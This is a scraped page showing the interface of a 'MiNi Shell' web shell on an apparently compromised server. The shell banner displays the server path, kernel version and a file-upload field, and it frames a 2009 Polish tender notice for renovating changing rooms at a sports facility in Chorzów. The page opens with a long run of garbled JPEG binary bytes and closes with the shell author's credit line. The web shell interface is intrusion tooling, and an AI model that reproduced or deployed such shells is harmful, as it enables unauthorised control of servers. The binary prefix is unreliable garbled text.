JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/137466-N-2009.html

<p class="kh_header"><b>Chorzów: Remont pomieszczeń na szatnie w obiekcie przy ul. Pokoju w Chorzowie.</b><br>
<b>Numer ogłoszenia: 137466 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Rekreacji i Sportu , ul. Dąbrowskiego 113, 41-500 Chorzów, woj. śląskie, tel. 032 2417050, 2411313, faks 032 2417055.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.moris.chorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń na szatnie w obiekcie przy ul. Pokoju w Chorzowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia obejmuje:
Roboty demontażowe:
-	skucie tynków wewnętrznych cem - wap i cementowych.
-	wykucie drzwi wewnętrznych drewnianych.
-	demontaż rusztów drewnianych boazeryjnych.
-	wykucie otworów w stropach betonowych i ścianach dla przewodów instalacyjnych.
-	rozebranie wykładziny ściennej płytek ceramicznych.
-	rozebranie ścianek działowych z cegły.
-	rozebranie posadzki płytek ceramicznych.
-	skucie posadzki cementowej.
-	rozebranie ścianek basenu ponad posadzką, betonowych zbrojonych.
- zasypanie gruzem baseniku
-	wykucie gniazd w ścianach z cegieł dla nadproża z dwuteownika i tablicy rozdzielczej.
-	demontaż rurociągu stalowego wraz z zaworami i bateriami.
-	demontaż umywalek.
-	demontaż ustępu.
-	demontaż grzejników rurowych i płytowych.
-	demontaż drobnego osprzętu w sanitariatach.
-	demontaż kanału wentylacyjnego z blachy.
-	wykucie bruzd instalacyjnych dla rur PP oraz instalacji elektrycznej.
-	demontaż instalacji elektrycznej wraz z wyłącznikami i gniazdami.
-	demontaż opraw oświetleniowych.
-	demontaż tablicy rozdzielczej.
-	demontaż łączników i gniazd wtyczkowych oraz puszek instalacyjnych.
-	wywóz gruzu i opłata za wysypisko.

 Roboty wod - kan i co:
-	wykonanie podejścia pod istniejący rurociąg.
-	zakup i wykonanie instalacji wody ciepłej i zimnej z rur PP wraz z rurami osłonowymi Peschel
  oraz podejść do urządzeń.
-	zakup i montaż rurociągu z rur stalowych o połączeniach spawanych.
-	zakup i montaż zaworów przelotowych i zwrotnych.
-	zakup i przyspawanie rur stalowych przyłącznych do grzejników
-	zakup i montaż grzejników stalowych dwupłytowych o wymiarach jak w przedmiarze robót.
-	zakup i montaż zaworów termostatycznych i grzejnikowych.
-	zakup i wykonanie instalacji kanalizacyjnej z PCV na ścianach wraz z podejściami.
-	zakup i obsadzenie przepustów rurowych.
-	zakup i montaż wpustu ściekowego z PCV z kratka nierdzewną oraz blokadą zapachową.
-	zakup i montaż ustępu z deską sedesową i płuczką typu kompakt
-	zakup i montaż umywalek porcelanowych.
-	zakup i montaż baterii urny wałkowej stojącej i natryskowej.
-	wykonanie próby szczelności instalacji.
Roboty murarskie:
-	zakup i wykonanie nadproża z belki stalowej dwuteowej.
-	uzupełnienie i zamurowanie bruzd i otworów po przebiciach instalacyjnych w stropach
i ścianach.

Roboty tynkarskie:
-	zakup i zamocowanie siatki tynkarskiej typu rabitza na nadprożach
-	wykonanie i uzupełnienie tynków wewnętrznych cem - wap III kategorii.
-	wykonanie pasów tynków po zamurowanych bruzdach instalacyjnych.
-	wykonanie dwuwarstwowej gładzi gipsowej.
Roboty posadzkarskie:
- wykonanie warstwy wyrównawczej pod posadzkę z zaprawy cementowej z wyprofilowaniem spadków zbrojonej siatką stalową z prętów fi 3mm.
- wykonanie izolacji poziomej na posadzce folii polietylenowej z wywinięciem na ściany wykonanie
- wylewki samopoziomujące
- ułożenie posadzki z płytek gresowych na kleju systemowym
- ułożenie obiektowej anty poślizgowej wykładziny z tworzyw sztucznych gr. minimum 2mm na posadzce

Okładziny ścienne:
- ułożenie wykładziny ściennej z płytek ceramicznych wraz z listwami narożnikowymi PCV

Roboty montażowe:
- montaż drzwi płytowych wewnętrznych, fabrycznie wykończonych z kratką wentylacyjną i okuciami oraz ościeżnicą stalową
- systemowe ścianki typu LTT lubrównorzędne do kabin ustępowych z drzwiami - profile aluminiowe anodowe w kolorze naturalnym, klamki z identyfikatorem zamknięcia - gałka, konstrukcja wypełniona płytą wodoodporną

Roboty malarskie:
- zeskrobanie i zmycie starej farby
- malowanie starych i nowych tynków cem-wap. Ścian i sufitów oraz powierzchni z płyt G-K farba emulsyjną  dwukrotnie
Roboty elektryczne:
- zakup i montaż obudowy tablicy rozdzielczej
- zakup i ułożenie przewodów kablowych YDY w bruzdach instalacyjnych
- zakup i obsadzenie puszek instalacyjnych PCV wraz z montażem wyłączników światła i gniazd wtykowych
- zakup i montaż opraw świetlówkowych zawieszonych 2x40W z blachy stalowej z kloszem z tworzyw sztucznych lub rastrem metalowych z podłączeniem - OPRAWY SZCZELNE DO POMIESZCZEŃ MOKRYCH
- zakup i montaż osprzętu dla tablicy rozdzielczej
- badania i pomiary instalacji
 Dokładny zakres prac  uwzględniony w STWiOR oraz przedmiarach robót
Całość zadania wykonać zgodnie ze specyfikacją techniczną wykonania i odbioru robót oraz przedmiarami, na podstawie których wykonawcy sporządzą kosztorys ofertowy.3.1.W przypadku wskazanych w dokumentacji  nazw urządzeń i materiałów dopuszcza się możliwość zastosowania urządzeń i materiałów równoważnych, pod warunkiem posiadania przez nie wszystkich wymaganych dopuszczeń i atestów oraz osiągania parametrów technicznych, jakościowych i eksploatacyjnych nie gorszych od tych ujętych w dokumentacji . Jeżeli wykonawca przewidzi w ofercie zastosowanie urządzeń i materiałów równoważnych, na wykonawcy ciąży obowiązek udowodnienia ich równoważności. Brak jednoznacznego wskazania w ofercie materiałów równoważnych będzie oznaczać wykonanie przedmiotu zamówienia z zastosowaniem urządzeń i materiałów wg dokumentacji przetargowej.
Przedmiot zamówienia należy objąć co najmniej 60 miesięczną gwarancją.
Wykonawcy dołączą do oferty dokumenty potwierdzające, że przedmiot oferty spełnia warunki minimalne sformułowane w siwz, a w szczególności jn..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.33.20.00-3, 45.26.25.20-2, 45.41.00.00-4, 45.43.21.11-5, 45.43.10.00-7, 45.42.10.00-0, 45.33.12.10-1, 45.44.21.00-8, 45.31.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE ŻĄDA WNIESIENIA WADIUM<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy :
-posiadają uprawnienia do wykonywania określonej działalności lub  czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień,
-posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych  podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
-znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zadania,
-nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Celem potwierdzenia warunku posiadania niezbędnej wiedzy i doświadczenia wykonawcy wykażą wykonanie  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
1 zadania odpowiadającego swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia

W zakresie dysponowania osobami zdolnymi do wykonania zamówienia: 
za spełnienie tego warunku Zamawiający uzna wykazanie dysponowania osobami uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie, w szczególności uprawnionymi do pełnienia funkcji kierownika budowy w zakresie niezbędnym do realizacji zamówienia, w specjalności:

-1 osoba o specjalności konstrukcyjno- budowlanej
a także z załączeniem dokumentów potwierdzających ich uprawnienia i zaświadczenia właściwych izb samorządu zawodowego architektów, inżynierów budownictwa oraz urbanistów o przynależności i ubezpieczeniu od odpowiedzialności cywilnej, a w przypadku gdy Wykonawca nie dysponuje osobami z wymaganymi uprawnieniami budowlanymi - również pisemne zobowiązanie innych podmiotów do udostępnienia tych osób  Wykonawcy ubiegającemu się o zamówienie.

W zakresie warunku dot. sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia wymagane jest :
-posiadanie ubezpieczenia działalności gospodarczej od odpowiedzialności cywilnej na kwotę co najmniej 100.000 złotych.
Ocena spełniania warunków udziału w postępowaniu będzie dokonywana metodą spełnia - nie spełnia. Niespełnienie któregokolwiek warunku spowoduje wykluczenie wykonawcy z postępowania.

6. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:
Celem potwierdzenia spełniania warunków udziału w postępowaniu oraz celem potwierdzenia, że przedmiot oferty spełnia wymagania techniczne, technologiczne, jakościowe i użytkowe narzucone przedmiotowi zamówienia, a także tego, że Wykonawca jest zdolny wykonać zamówienie zgodnie z wymaganiami, jakim podlega sposób wykonania zamówienia, Wykonawcy złożą niżej wymienione dokumenty.

6.1. Celem potwierdzenia spełniania wszystkich warunków udziału w postępowaniu Wykonawca złoży oświadczenie o spełnianiu tych warunków o treści odpowiadającej treści art. 22 ust. 1 ustawy Pzp.  Wzór - załącznik nr 1 do siwz.

6.2. Celem potwierdzenia spełniania warunku posiadania ustawowych uprawnień do prowadzenia działalności gospodarczej Wykonawca dołączy do oferty aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

6.3.   Celem udowodnienia, że nie podlegają wykluczeniu z postępowania, Wykonawcy dołączą do oferty:
-aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej, dołączają do oferty:
-dokumenty wystawione w kraju, w którym mają siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto ich likwidacji ani nie ogłoszono upadłości, nie orzeczono wobec nich zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż  6 miesięcy przed terminem składania ofert;
-zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert;
-zaświadczenia, że nie zalegają z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskali przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu z terminem wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, zastępuje się je:
-dokumentem, zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, że Wykonawca nie jest w stanie likwidacji, że nie ogłoszono jego upadłości, że nie podlega zakazowi ubiegania się o zamówienie, a osoby go reprezentujące lub on sam nie są ukarani za czyny wymienione w art. 24 ust. 1 punkt 4 - 8 ustawy Pzp, sporządzonym w terminie do 6 miesięcy przed terminem składania ofert;
-oraz dokumentem zawierającym oświadczenie, że Wykonawca nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, sporządzonym w terminie do 3 miesięcy przed upływem terminu składania ofert.

6.4. Celem potwierdzenia warunku posiadania niezbędnej wiedzy i doświadczenia Wykonawcy dołączą do oferty wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający co najmniej 1 zadanie odpowiadające w sposób opisany przez Zamawiającego w pkt. 5 siwz  swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie - (zał. nr  2 do SIWZ)

6.5. Celem potwierdzenia warunku dysponowania osobami zdolnymi do wykonania zamówienia, opisanego przez Zamawiającego w pkt. 5 siwz, Wykonawcy dołączą do oferty wykaz osób uprawnionych do pełnienia samodzielnych funkcji technicznych w budownictwie, wraz ze wskazaniem zakresu ich czynności w realizacji niniejszego zamówienia, tj. funkcji kierownika budowy w zakresie niezbędnym do realizacji zamówienia, w specjalności:

-1 osoba o specjalności konstrukcyjno- budowlanej

wraz z załączeniem dokumentów potwierdzających ich uprawnienia i zaświadczenia właściwych izb samorządu zawodowego architektów, inżynierów budownictwa oraz urbanistów o przynależności i ubezpieczeniu od odpowiedzialności cywilnej, a w przypadku gdy Wykonawca nie dysponuje osobami z wymaganymi uprawnieniami budowlanymi - również pisemne zobowiązanie innych podmiotów do udostępnienia tych osób  Wykonawcy ubiegającemu się o zamówienie. Wzór - załącznik nr 5 do siwz.

6.6. Celem potwierdzenia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia opisanego przez zamawiającego Wykonawcy dołączą do oferty:
-polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100.000 zł.   
Dokumenty, o których mowa wyżej winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

6.7.   Wykonawcy wspólnie ubiegający się o zamówienie:
1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, ustanawiając pełnomocnika do reprezentowania ich w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2) Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za   wykonanie umowy.
3) Każdy z Wykonawców występujących łącznie jest obowiązany złożyć indywidualnie dokumenty wymienione w poz.6.1, 6.2 i 6.3 niniejszej specyfikacji. Pozostałe dokumenty Wykonawcy składają wspólnie.
4) Zamawiający oceni spełnianie poszczególnych warunków udziału w postępowaniu przez Wykonawców składających wspólną ofertę w następujący sposób:

-niespełnienie warunku w zakresie nie podlegania wykluczeniu z postępowania przez któregokolwiek z Wykonawców wyklucza wszystkich Wykonawców składających wspólną ofertę;



-spełnienie warunków dotyczących wiedzy i doświadczenia, uprawnień i kwalifikacji osób   przewidzianych do realizacji zamówienia oraz zdolność finansowa (kredytowa) będą oceniane łącznie;
-każdy z Wykonawców występujących wspólnie musi być ubezpieczony od OC na ww. warunkach, przy czym będzie oceniana łączna suma ubezpieczenia ( kwota gwarancyjna).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> j.w..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.moris.chorzow.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Rekreacji i Sportu, 41-500 Chorzów, ul. Dąbrowskiego 113,pokój 335,za cenę 15 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 09:00, miejsce: Miejski Ośrodek Rekreacji i Sportu, 41-500 Chorzów, ul. Dąbrowskiego 113,pokój 335.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com